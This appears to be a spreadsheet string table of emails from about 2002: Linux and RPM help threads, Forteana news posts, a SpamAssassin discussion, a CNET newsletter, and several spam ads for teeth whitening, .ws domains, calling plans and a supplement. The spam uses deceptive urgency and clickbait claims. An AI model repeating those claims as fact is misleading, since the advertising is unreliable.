    <t xml:space="preserve">&gt; The only circumstances in which a business will not be ready--indeed,
 &gt; eager--to do an additional volume of business is if it is physically unable
 &gt; to do so because it lacks the necessary physical means of doing so, or
 &gt; because the costs it incurs in doing so exceed the additional sales revenue
 &gt; it will receive.
 That is a fully retarded view of economics, and pretty much the same kind
 of clueless oversimplication that led to the blackouts.  There are a
 bazillion factors that affect game strategies, which is what the state of
 California messed up and the energy producers exploited.
 I'm not convinced that the only way to prevent future energy debacles like
 the blackouts is to reregulate.  Ultimately we have to blame the people
 who crafted the game rules in a way that invited blackouts and
 exploitation.  Given that the particular set of rules crafted by the state
 of California sucked, does there exist a set of rules that doesn't suck?  
 If there does exist a better set of rules, then reregulation isn't
 necessarily the answer.
 You can't blame businesses for being profit maximizers.  Yes, the people 
 involved were heartless and corrupt.  But mainly they just did their 
 jobs.
 The guilty parties are either the mathematicians and economists who wrote
 the rules or, if the mathematicians and economists said there were no good
 rules, pro-deregulation politicians who went ahead anyway.
 - Lucas
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Man admits Soham kidnapping hoax calls
</t>
  </si>
  <si>
    <t xml:space="preserve">Ananova: 
 Man admits Soham kidnapping hoax calls
 A man has admitted making hoax calls to police investigating the
 disappearance of Soham schoolgirls Jessica Chapman and Holly Wells.
 Wrexham Magistrates Court, in North Wales, heard jobless Howard Youde made
 three calls to police in Cambridgeshire claiming to have abducted the
 youngsters.
 He was arrested in Wrexham in the early hours of August 16 when officers
 traced the call to a phone box on the town's Brook Street.
 The 45-year-old, of Queensway, Hope, near Wrexham, has pleaded guilty to one
 count of wasting police time on August 15 this year.
 The court was told Youde claimed to have no recollection of making the calls
 having been drinking all day.
 Defence lawyer Mark Arden says the offence was neither premeditated nor
 calculated but added that this was no excuse.
 He said: "What he's done is horrific. It's unforgivable. The distress he's
 caused the families is unacceptable."
 Youde has been released on unconditional bail until November 7 when he will
 be sentenced.
 The hearing has been adjourned for pre-sentence reports although the
 defendant has been warned custody is an option.
 Story filed: 12:36 Monday 7th October 2002
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Plan to Sell a Home?
 http://us.click.yahoo.com/J2SnNA/y.lEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Please help a newbie compile mplayer :-)
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, rob wrote :
 &gt;  I dl'd gcc3 and libgcc3, but I still get the same error message when I 
 &gt; try rpm --rebuild or recompile. I do this as root, I dl'd as root also.
 &gt; 
 &gt; thanks for the help, any more idea what's going on?
 I've never installed source rpms with apt, but I suppose that if you get
 file not found, it's because the source rpm was installed. To see if this
 is the case, go to /usr/src/redhat/SPECS/ and if you see mplayer.spec,
 you'll just need to do "rpm -bb mplayer.spec" to get a binary build in
 /usr/src/redhat/RPMS/i386/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</si>
  <si>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[use Perl] Headlines for 2002-09-01
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline Mailer
 Perl Ports Page
     posted by hfb on Saturday August 31, @13:40 (cpan)
     http://use.perl.org/article.pl?sid=02/08/31/1744247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</si>
  <si>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[ILUG] Newbie Questions
</t>
  </si>
  <si>
    <t xml:space="preserve">Yo Mark,
 Have you goten the closed source drivers from Nvidia or are you still using
 the wans that came with Redbum? 
 http://www.nvidia.com and then somewhere...somwhere-else...
 Installation is WELL detailed, you should see the NV splash screen, don;t
 forget to edit the config files.
 CW
 --------------------------------------
 Hi
 I have just installed Red Hat 7.2 on my desktop machine. I am completely new
 to Linux and therefore have run into a few problems.
 The graphic display on my PC doesnt seem to work. My monitor is slightly
 miss-aligned and I cannot run any high resolution games ( everything freezes
 ). In the hardware browser in Gnome it lists my Graphics Card (Riva TNT2),
 and shows installed drivers...... maybe the problem lies elswhere.
 Another problem I have is that I cannot install my ISDN, USB modem ( LASAT
 Speed Basic ), however im pretty sure its not supported by Linux, but again
 it is featured in the Hardware Browser, without installed drivers.
 If anybody has any ideas, please let me know cos id like to use Linux more.
 Please keep in mind I am new to it though.
 Thanks
 Mark
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Bond-Barbie
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85488621
 Date: Not supplied
 Barbie has been made over as a Bond girl:  
     [IMG: http://www.craphound.com/images/bondbarbie.jpg] As James Bond, Ken 
     has matured nicely with rooted hair, with slight silvering at his temples, 
     wearing a midnight blue tuxedo, and authentic recreation of the classic tux 
     by Brioni, the famed clothier. Linda Hemming, the award winning costume 
     designer in charge of this year's James Bond film, outfits Barbie doll. She 
     wears a blood red gown with a glittering gold lace overlay and a gauzy red 
     shawl with a gold filigree design. Her gown is cut up the side to reveal 
     lots of leg as well as not so discreet hip strap that anchors Barbie's cell 
     phone. The set is slated for release in November, to coincide with the 
     premiere of "Die Another Day," the new James Bond film. Bond, James Bond, 
     meet Barbie, just Barbie...  
 Link[1] Discuss[2] (_Thanks Derek!_)
 [1] http://www.barbiebazaar.com/featured.htm
 [2] http://www.quicktopic.com/boing/H/jsxte7PqRiA
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Your First 100 Free Minutes of Long Distance! Your First 100 Free
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Hello Unlimited International Telephone Call Marketer,
 If you ordered a flat-rate domestic calling product or a 20 minute free trial using a local access number, your service will be operating in about 24-48 hours or on your designated trial date and time.  Please try dialing the access number you found on your reseller's web page at:
 http://www.internationalfreecall.com
 If you ordered a flat-rate domestic calling product using a 1-800 toll-free access number, your service will be operating within 1-2 work days.
 Please try dialing 1-866-865-4548.
 In either case, when your service is switched on, you will hear a voice ask you to dial the number you are calling.
 You must dial 1+area code+7 digit number followed by # to make any calls: local or long distance.
 Example - To call www.internationalfreecall.com, you would dial the following after dialing your access number and listening for the voice:
 1-410-608-8178# 
 Please use this service for all your calling and you will never pay more than your monthly fee again. There are no taxes or surcharges, so dial away!
 Finally, I recommend entering the access number into your speed dial settings on your telephone.  This will make your service quicker and easier to use, and thus more enjoyable.
 If you have any questions, please contact us for more information.
 In addition, if you need product enhancements like 3-way calling, portable calling cards, international calling products, or marketing tools, please visit:
 http://www.internationalfreecall.com
 In the meantime, the other network on this free calling promotion is OPEX, which is offering 100 minutes of free long distance for trying their program.  
 Opex's usual rates are 4.5 cents per minute for domestic calls, with great international rates, too!
 For more information on OPEX, or to sign up, please click below:
 http://cognigen.net/opex/main.cgi?lietuva
 To unsubscribe from this mailing list, please click on:
 http://www.internationalfreecall.com/cgi-bin/aefs/subscribe.cgi?user=info&amp;listid=1.list&amp;id=1680
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Italy goes over old battlegrounds
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8702434,215/
 Date: 2002-10-09T14:04:56+01:00
 *Rome dispatch: *Italy's 'post-fascist' National Alliance is behind two 
 controversial attempts to commemorate the country's military past, writes *
 Philip Willan*.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [zzzzteana] Bigfoot and big feet on display at Peabody
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;Benoit claimed the prize for his size 14 feet. In the female division of the
 &gt;competition, three women tied for first place with size 10 feet.
 &gt;Winners took home a $100 gift certificate to either Footlocker or Barrie
 &gt;Ltd.
 Well crap, mine are size 11.
 &gt;
 &gt;"If I'd have known the contest was happening, I would have gone," said
 &gt;Justin Simon '04, the proud owner of size 15 feet. "A lot of the guys have
 &gt;bigger feet than that. Dexter Upshaw ['06] wears a size 18."
 &gt;
 &gt;Simon said the $100 gift certificate would have almost paid for a new pair
 &gt;of shoes.
 Almost. If you shop at Payless!!
 But sure could have used the $100 anyway!
 -- 
 Fel
 NEW!! Cafe Forteana is back: http://www.frogstone.net/Cafe/CafeForteana.html
 http://www.frogstone.net
 Weird Page: http://my.athenet.net/~felinda/WeirdPage.html
 [Non-text portions of this message have been removed]
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Home Selling? Try Us!
 http://us.click.yahoo.com/QrPZMC/iTmEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Global call for extrasolar planet watching
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8365765,1440/
 Date: Not supplied
 Professionals are asking amateurs to sign up and help them glean valuable 
 information about planets orbiting distant stars
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 2 Oct 2002 10:53:24 +0200, Matthias Saou &lt;matthias@egwn.net&gt; wrote:
 &gt; &gt;     Anyway, I have returned to Redhat 7.3 on my root filesystem (saved my
 &gt; &gt;     home directories, music and games on other partitions) and while I
 &gt; &gt;     have the 8.0 stuff in the list, everything I want to upgrade requires
 &gt; &gt;     200+ RPMs.
    Yeah, but I try to 'take it easy' on your server.  The golden rule of the internet: when you find a free resource, don't piss'em off!  :)  I really appreciate your work; you get done the things I wish I could, and I respect that.
 &gt; Anyway, although I'd easily recommend upgrading 7.x to 7.3 using apt, I
 &gt; wouldn't for 7.x to 8.0 as they are C++ binary incompatible... and apt is
 &gt; entirely written in C++ and dynamically linked :-/
     OK, I'll search for the ISOs on the  one remaining site that isn't hammered.  :)
 &gt; Still, that doesn't explain a core dump :-(
     Sure: this is a linking issue, right?  Right now I'm still pure-vanilla.  I have the stock version of rpm/rpmlib/popt/etc and the recommended version of apt that you gave me.  No, wait...there's no new code getting loaded.  I don't know, either.  It's been a long day.
 &gt; &gt;     What's the inside secret here, or do I just start searching mirrors
 &gt; &gt;     for the ISO and get over it?
 &gt; 
 &gt; Why "search"? There's more than enough to choose from here :
 &gt; http://freshrpms.net/mirrors/psyche.html
    The hunt continues- with a new field!  (Actually I checked there yesterday, but it's worth another shot.)
     Thanks!
 ------------------------------------------------------------------------
 Brian Fahrlnder              Linux Zealot, Conservative, and Technomad
 Evansville, IN                    My Voyage: http://www.CounterMoon.com
 ICQ  5119262
 ------------------------------------------------------------------------
 Just machines, to make big decisions- programmed by fellas with
 compassion and vision.  We'll be clean when that work is done;
 Eternally free and eternally young.  Linux.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] The new Steve Earle
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.nme.com/news/102774.htm
 CAM'RON  associate  JUELZ SANTANA  has vehemently defended a lyric on the
 forthcoming album by the pair's  DIPLOMATS  crew that pays tribute to
 September 11 hijacker  OMAR ATTA
 ...
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Nessus?
</t>
  </si>
  <si>
    <t xml:space="preserve">I've put up a new Red Hat Linux 8.0 build of nessus here :
 http://ftp.freshrpms.net/pub/freshrpms/testing/nessus/
 It's 100% untested, although the build should be ok. The new menu was
 added, but some configuration files may be better with new or different
 defaults.
 Feedback is very welcome!
 Matthias
 -- 
 Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
 Load : 0.06 0.12 0.17
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] results for giant mass-check (phew)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 On Tuesday, August 20, 2002, at 07:23  AM, Justin Mason wrote:
 &gt;&gt; The compensate rule USER_AGENT should go or at least score 
 &gt;&gt; very low; with
 &gt;&gt; it, a spammer just has to include a header like
 &gt;
 &gt; BTW, the scores are irrelevant right now (unless the test is 
 &gt; going to have
 &gt; a non-GA'd score).  The GA should reduce "easy" ones, and if it 
 &gt; doesn't,
 &gt; after the GA run is the time to comment.  Don't pay any 
 &gt; attention to them!
 &gt; ;)
 Remember that the GA is going to be considering combinatorial 
 uses of the rules, so rules which look dodgy on their own might 
 be gems for the GA -- perhaps something with a S/O ratio of .5 
 actually occurs often in combination with some other rule, and 
 in those situations, helps to distinguish spam vs nonspam.
 C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</si>
  <si>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Is Neotropin right for you?
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;body&gt;&lt;center&gt;&lt;a href=http://www.vitafactory.com/&gt;&lt;img src=http://www.vitafactory.com/images/vitafactory-mail-logo.jpg border=0&gt;&lt;hr&gt;&lt;a href=http://www.vitafactory.com/ad-monday/1.html&gt;&lt;img src=http://www.vitafactory.com/ad-monday/1.gif border=0&gt;&lt;/a&gt;&lt;hr&gt;&lt;br&gt;&lt;a href=http://www.vitafactory.com/ad-monday/&gt;&lt;img src=http://www.vitafactory.com/ad-monday/joke1000.gif border=0&gt;&lt;hr&gt;&lt;a href=http://www.vitafactory.com/ad-monday/2.html&gt;&lt;img src=http://www.vitafactory.com/ad-monday/2.gif border=0&gt;&lt;/a&gt;&lt;hr&gt;  &lt;p align=left&gt;&lt;br&gt;&lt;/font&gt;&lt;font color=#616161 face=Verdana size=1&gt;&lt;b&gt;Unsubscribe:&lt;/b&gt;&lt;br&gt;Please send a blank mail to:&lt;br&gt;unsub-56446664-3@william.monsterjoke.com&lt;br&gt;&lt;br&gt;&lt;a href=http://www.mach10.com/&gt;&lt;img src=http://www.vitafactory.com/images/mach10.gif border=0&gt;&lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, Feb 06, 2002 at 04:30:18PM +0200, Harri Haataja wrote:
 &gt; I have a few such things (with jdk, imlib, kernel DRI version..
 &gt; something) and Ive just made dummy packages (with verbose warning
 &gt; attached ;) that explicitly provide those capabilities. (or claim to,
 &gt; that is).
 Hm. One could do this with rpm's --justdb switch too, without having to 
 make a dummy package, right?
 I was wondering that this is a bit dangerous if there is a update for my 
 software, as the dummy package might get updated with it overwriting the 
 installation I've done from source... Not good.
 Is there really no "--nodeps" kind of switch in apt-get? 
 -- 
 Peter
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Brown budget plans in disarray
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8418823,215/
 Date: 2002-10-01T04:34:02+01:00
 Treasury admits that growth targets set in March have been destroyed by the 
 worsening global economy.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Brighten Those Teeth
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- saved from url=3D(0022)http://internet.e-mail --&gt;
 &lt;!-- saved from url=3D(0022)http://internet.e-mail --&gt;
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Bright Teeth now!&lt;/TITLE&gt;
 &lt;META content=3D"text/html; charset=3Diso-8859-1" http-equiv=3DContent-Typ=
 e&gt;
 &lt;META content=3D"Microsoft FrontPage 4.0" name=3DGENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY aLink=3D#66ffcc link=3D#0099ff text=3D#333333 vLink=3D#0099ff&gt;
 &lt;TABLE align=3Dcenter bgColor=3D#0099ff border=3D0 cellPadding=3D1 cellSpa=
 cing=3D0 
 width=3D600&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD&gt;
       &amp;nbsp;
       &lt;TABLE bgColor=3D#ffffff border=3D0 cellPadding=3D0 cellSpacing=3D0 =
 width=3D600&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD vAlign=3Dtop width=3D"201"&gt;&lt;img border=3D"0" src=3D"http://2=
 04.94.166.10/5facesfade.jpg"&gt; 
             &lt;p&gt;&amp;nbsp;&lt;/p&gt;
           &lt;/TD&gt;
           &lt;TD width=3D"395"&gt;
             &lt;P align=3Dleft&gt;&lt;B&gt;&lt;FONT color=3D#FF0000 
             face=3D"Trebuchet MS, Arial, Helvetica, sans-serif" size=3D4&gt;G=
 et Your 
             Teeth Bright White Now! &lt;/FONT&gt;&lt;/B&gt; &lt;/P&gt;
             &lt;P&gt;&lt;FONT face=3D"Trebuchet MS, Arial, Helvetica, sans-serif" 
             size=3D2&gt;Have you considered professional teeth whitening? If =
 so, you 
             know it usually costs between $300 and $500 from your local 
             dentist!&lt;/FONT&gt;&lt;/P&gt;
             &lt;P&gt;&lt;FONT face=3D"Trebuchet MS, Arial, Helvetica, sans-serif" s=
 ize=3D2&gt;&lt;A 
             href=3D"http://204.94.166.35/"&gt;&lt;b&gt;&lt;font color=3D"#0000FF"&gt;Visi=
 t our site&lt;/font&gt;&lt;/b&gt;&lt;/A&gt; to learn how to 
             professionally whiten your teeth, using the exact same whiteni=
 ng 
             system your dentist uses, at a fraction of the cost!&lt;BR&gt;&lt;B&gt;&lt;BR=
 &gt;&lt;FONT 
             color=3D#FF0000 size=3D3&gt;Here's what you get&lt;/FONT&gt;&lt;/B&gt;&lt;FONT 
             color=3D#0099ff size=3D3&gt;:&lt;/FONT&gt;&lt;/FONT&gt;&lt;/P&gt;
             &lt;UL&gt;
               &lt;LI&gt;&lt;FONT face=3D"Trebuchet MS, Arial, Helvetica, sans-serif=
 " 
               size=3D2&gt;We will show you what to look for in a whitening 
               system!&lt;/FONT&gt; 
               &lt;LI&gt;&lt;FONT face=3D"Trebuchet MS, Arial, Helvetica, sans-serif=
 " 
               size=3D2&gt;We will show you a comparison of all of the product=
 s 
               available today, including their costs!&lt;/FONT&gt; 
               &lt;LI&gt;&lt;FONT face=3D"Trebuchet MS, Arial, Helvetica, sans-serif=
 " 
               size=3D2&gt;We know our product is the best on the market, and =
 we back 
               it with a 30 day money back guarantee!&lt;/FONT&gt; &lt;/LI&gt;&lt;/UL&gt;
             &lt;P align=3Dcenter&gt;&lt;FONT 
             face=3D"Trebuchet MS, Arial, Helvetica, sans-serif" size=3D3&gt;&lt;=
 A 
             href=3D"http://204.94.166.35/"&gt;&lt;b&gt;&lt;font color=3D"#0000FF"&gt;Clic=
 k here to learn more!&lt;/font&gt;&lt;/b&gt;&lt;/A&gt; 
             &lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE=
 &gt;
 &lt;p align=3D"center"&gt;&lt;font face=3D"Arial" size=3D"1"&gt;You are receiving this=
  email as an
 Internet Affiliate Network member.&amp;nbsp; If you would no longer like to re=
 ceive
 special promotions&lt;br&gt;
 &amp;nbsp;via email from Internet Affiliate Network, then &lt;a href=3D"btcremove=
 @yahoo.com"&gt;click
 here&lt;/a&gt; to unsubscribe&lt;/font&gt;&lt;/p&gt;
 &lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The database that Bill Gates doesnt want you to know about!!!!!
</t>
  </si>
  <si>
    <t xml:space="preserve">IMPORTANT NOTICE:  Regarding your domain name
 * If you own a .com/.net/.org, you are advised to register 
   your .ws "web site" domain before someone else takes it forever.
 * Major corporations such as Yahoo, ATT &amp; Intel, have all
   registered their .ws "web site" domains for their company names 
   as well as all their trademarks, to protect them forever.
 * .ws "web site" domains are in 180+ countries worldwide
 * Availability for .ws is ~88% compared to ~24% for .com
 We thought you'd find the article on .ws below interesting. 
 If you want more information on where to register .ws "web site"
 domains, and how to get a discount on multiple registrations, 
 contact us at  http://www.netleads.ws/morgan
 Also, if you would like to increase traffic to your web site, 
 by submitting your URL to 500+ search engines and directories
 at once, then call us today.
 Sincerely,
 Joe &amp; Stacy Morgan
 +1.888.660.0625
 Internet Names, LLC.
 #########################
 NEWS RELEASE:
 .WS (WebSite) Domains Strikes Landmark Deal:
 GDI receives $2,250,860 for the rights to 311 "premium" .ws domain
 names.
 ---
 Last week, GDI (Global Domains International, Inc.), the registry for.ws
 "web site" domains, closed a deal with a large publicly traded company,
 one of the biggest players in the .com arena, and received payment in
 full of $2,250,860 for the rights to a select group of "premium" .ws
 domain names. The 311 domain names will be resold to the highest
 bidders and ultimately developed into substantial .ws web sites, giving
 .ws even more publicity down the road.
 To be be removed  http://www.netleads.ws/remove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</si>
  <si>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[ILUG] SUSE 8 disks? (thread changed slightly)
</t>
  </si>
  <si>
    <t xml:space="preserve"> &gt; I don't discount any other work like for
  &gt; example Niall's work on the B.B.C. but maybe
  &gt; there is general interest in an Irish distro.
  &gt; Anyone?
  I'll bite.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: CNET NEWS.CONTEXT: Hollywood &amp; Silicon Valley: A way out?
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
         &lt;title&gt;CNET | News.context&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#e5e5e5"&gt;
 &lt;center&gt;
 &lt;a name="top"&gt;&lt;/a&gt;
 &lt;!-- Logo and ad banner --&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 	&lt;tr valign=top&gt;
     &lt;td width=442 colspan=4 bgcolor="#e5e5e5"&gt;
         &lt;img src="http://home.cnet.com/i/ne/ds/nched.gif" alt="" width="442" height="63" border="0"&gt;&lt;br&gt;
     &lt;/td&gt;
     &lt;td width=160 rowspan=2 align=center&gt;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href="http://clickthru.online.com/Click?q=cd-VHhSQzsKThB3tiBFjAi_TOlRfXuR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=e2-J1OpQhyzisJCKDOENBEZdihv9KsR" &gt;April's tech award&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f7-N0QnQLgzoJf3jfOlrZIGiR6ImOZR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=0d-3aGuIbr2CKATRE6Nv0T0QkY6b7uR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=22-xNrrIrdArW4RVhVuo4I9yc99NcsR"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width=5&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="5" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;td&gt;
 	&lt;table cellpadding=0 cellspacing=0 border=0 width=252&gt;
 	&lt;tr&gt;
 	&lt;td&gt;&lt;img src="http://home.cnet.com/i/ne/ds/nc.gif" alt="News.context" width="76" height="16" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 &lt;!-- Date --&gt;
 	&lt;td align=right&gt;&lt;font face="Arial, Helvetica" size="-2"&gt;July 11, 2002&lt;/font&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 	&lt;font face="Arial, Helvetica" size="-1"&gt;
 	&lt;p&gt;
 		&lt;img src="http://news.cnet.com/i/ne/pr/gr/prtease_cooper.gif" width="65" height="82" border="0" align="right"&gt;&lt;b&gt;Hollywood &amp; Silicon Valley: A way out?&lt;/b&gt;&lt;p&gt;
 		The controversy over digital file swapping is no closer to an amicable resolution than it was when peer-to-peer technology first came into vogue.
 		&lt;p&gt;
 		&lt;a href="mailto:charles.cooper@cnet.com"&gt;Charlie Cooper&lt;/a&gt;, Executive Editor/Commentary&lt;br&gt;
 		&amp;nbsp;&lt;br&gt;
 	&lt;/font&gt;&lt;/td&gt;
    &lt;td width=5&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="5" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;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&lt;b&gt;Just desserts for scofflaws&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 U.S. Rep. &lt;b&gt;Howard L. Berman&lt;/b&gt; weighed in this week, arguing that piracy over P2P networks robs songwriters on a massive scale. The congressman from Hollywood has authored a bill to stop illegal digital downloads by giving copyright owners the ability to technologically impair the distribution of copyrighted works.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=37-EMLQIqzFSrjTP9wQ93KjZ6eJcnZR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;P&gt;
 &lt;a name="h2"&gt;&lt;b&gt;Spotting a scam in sheep's clothing&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Berman's proposal received a cool reception in Silicon Valley, where rules are frowned upon and unfettered innovation reigns supreme. So it was that StreamCast CEO &lt;b&gt;Steve Griffin&lt;/b&gt; spoke for many in the community when he wrote that Berman's proposal won't work. What's more, he wondered, was Berman really concerned about controlling piracy, or could the congressman from Hollywood be influenced by certain constituents? Conspiracy buffs this week had a field day.&lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=4c-jxi2IZpI6YaLksnAu7hgvo2AKenR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h3"&gt;&lt;b&gt;How to curb digital piracy&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 The odds that either side will raise the white flag are slim. But must this debate necessarily turn into an endless donnybrook? Former White House staffer &lt;b&gt;Jonathan Greenblatt&lt;/b&gt; doesn't buy into historical determinism, and believes Hollywood can respond to the challenge of new media. First, it must shy away from any legislation that aims to control technology or enforces any "draconian" digital rights management rules. What other suggestions does he offer? Read on.&lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=61-x9oAIoLj9WWtbcj4JYndFK-AWlrR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;br&gt;
 &lt;a name="h4"&gt;&lt;b&gt;Writing file sharing's final chapter&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 All this occurs as the P2P community lost one of its brighter lights. Computer scientist and entrepreneur &lt;b&gt;Gene Kan&lt;/b&gt; died June 29. Kan, who helped to develop an early open-source version of Gnutella software, wrote a column for CNET News.com on June 21, drawing on the lessons learned from the history of peer-to-peer technology. In this highly nuanced piece, Kan offers a timely warning about what can happen when people get overly excited about new technologies.&lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=76-vJf7InBP3QFd7XP1okYP2r70U6iR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h5"&gt;&lt;b&gt;CEOs: Are you too focused?&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Conventional wisdom has it that "focus" is de rigueur for any corporation hoping to achieve superior performance. The flip side of this argument is that markets are quick to discount the valuations of diversified companies because of perceived shortcomings. But researchers at McKinsey offer an alternative idea, suggesting that there's a particularly fertile middle ground between focus and diversification.&lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=8c-Ld7aQ6JBHt02tYEVFm8il40AWNdR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;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href="http://clickthru.online.com/Click?q=a1-AfVtQ-ZKME2dMZZGkeHaXeD3gBcR" &gt;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is&amp;nbsp;qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org&lt;br&gt;
